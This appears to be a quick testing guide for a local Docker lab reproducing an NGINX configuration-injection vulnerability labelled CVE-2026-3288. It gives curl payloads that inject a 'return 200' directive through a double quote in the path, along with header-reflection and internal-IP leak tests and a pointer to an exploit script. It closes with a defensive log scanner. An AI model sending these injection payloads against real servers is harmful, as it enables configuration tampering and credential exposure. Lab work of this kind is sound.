# CVE-2026-3288 Lab - Quick Testing Guide

## Lab is Running on Port 9090

All tests use: `http://localhost:9090`

---

## Test 1: Basic Connectivity

```bash
curl http://localhost:9090/
```

**Expected:** "CVE-2026-3288 Vulnerable Lab"

---

## Test 2: Configuration Injection (Main Vulnerability)

```bash
curl 'http://localhost:9090/api" return 200 "HACKED'
```

**Expected:** "HACKED - Configuration Injection Successful!"

**What's happening:** The double quote (`"`) in the path breaks out of NGINX's quoted string and injects a `return 200 "HACKED"` directive.

---

## Test 3: Alternative Injection Endpoint

```bash
curl 'http://localhost:9090/vuln" return 200 "PWNED'
```

**Expected:** "PWNED - Injection via rewrite!"

---

## Test 4: Credential Theft

```bash
curl -H "Authorization: Bearer secret123" http://localhost:9090/login
```

**Expected:** JSON response showing your Authorization header was captured

**What's happening:** The backend reflects the Authorization header, demonstrating credential theft.

---

## Test 5: Internal IP Leak

```bash
curl 'http://localhost:9090/admin?internal_ip=true'
```

**Expected:** "Internal IP: 10.0.0.5"

**What's happening:** Injected logic reveals internal network information.

---

## Test 6: Backend Access

```bash
curl http://localhost:9090/backend
```

**Expected:** JSON response from Flask backend showing available endpoints

---

## Automated Testing

Run all tests at once:

```bash
cd /root/abhishek/cve/CVE-2026-3288-lab/exploits
python3 exploit.py --target http://localhost:9090 --all
```

---

## Check Container Status

```bash
docker-compose ps
```

Should show:

- cve-2026-3288-nginx: Up, 0.0.0.0:9090->80/tcp
- cve-2026-3288-backend: Up
- cve-2026-3288-monitor: Up

---

## View Logs

```bash
# NGINX access logs
docker-compose logs -f nginx

# Backend logs
docker-compose logs -f backend

# All logs
docker-compose logs -f
```

---

## Troubleshooting

**Port already in use?**

```bash
docker-compose down -v
docker-compose up -d
```

**Need to rebuild?**

```bash
docker-compose down -v
docker-compose build --no-cache
docker-compose up -d
```

**Check what's on port 9090:**

```bash
sudo lsof -i :9090
# or
sudo netstat -tulpn | grep :9090
```
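
To spot the Test 2 and Test 3 requests in the NGINX access log, the following added example (not part of the lab's own code) flags request paths that contain a double quote, whether logged as `\x22` or sent percent-encoded as `%22`. It assumes the default `combined` log format, where NGINX writes `"` as `\x22`; the sample lines, the directive keyword list and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line and status of an NGINX "combined" access-log entry (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>.+?) HTTP/\d(?:\.\d)?" (?P<status>\d{3}) ')
# A quote directly followed by a directive name; the keyword list is illustrative.
DIRECTIVE_RE = re.compile(r'"\s*(return|rewrite|proxy_pass|set|add_header|alias|root)\b', re.I)
LOG_ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{2})')

# Constructed sample lines, not output captured from the lab.
SAMPLE_LOG = r'''
172.18.0.1 - - [01/Jan/2026:10:00:00 +0000] "GET / HTTP/1.1" 200 28 "-" "curl/8.5.0"
172.18.0.1 - - [01/Jan/2026:10:00:05 +0000] "GET /api\x22 return 200 \x22HACKED HTTP/1.1" 200 44 "-" "curl/8.5.0"
172.18.0.1 - - [01/Jan/2026:10:00:09 +0000] "GET /vuln%22%20return%20200%20%22PWNED HTTP/1.1" 200 30 "-" "curl/8.5.0"
172.18.0.1 - - [01/Jan/2026:10:00:12 +0000] "GET /search?q=%22quoted%22 HTTP/1.1" 200 12 "-" "curl/8.5.0"
172.18.0.1 - - [01/Jan/2026:10:00:15 +0000] "GET /files/a%22b.txt HTTP/1.1" 404 153 "-" "curl/8.5.0"
'''

def decode_path(target):
    """Drop the query string, then undo NGINX hex log escaping and percent-encoding."""
    path = target.split("?", 1)[0]
    path = LOG_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), path)
    return unquote(path)

def classify(line):
    """Return (severity, decoded_path, status), or None when the path has no quote."""
    m = REQUEST_RE.search(line)
    if m is None:
        return None
    path = decode_path(m.group("target"))
    if '"' not in path:
        return None
    # A quote followed by a directive keyword matches the shape of Tests 2 and 3.
    severity = "high" if DIRECTIVE_RE.search(path) else "medium"
    return severity, path, int(m.group("status"))

def scan(log_text):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for severity, path, status in scan(SAMPLE_LOG):
        print(f"{severity:6} status={status} path={path!r}")
```

Quotes in the query string are ignored here because the guide's injection tests place the quote in the path; widen `decode_path` if your configuration also interpolates arguments.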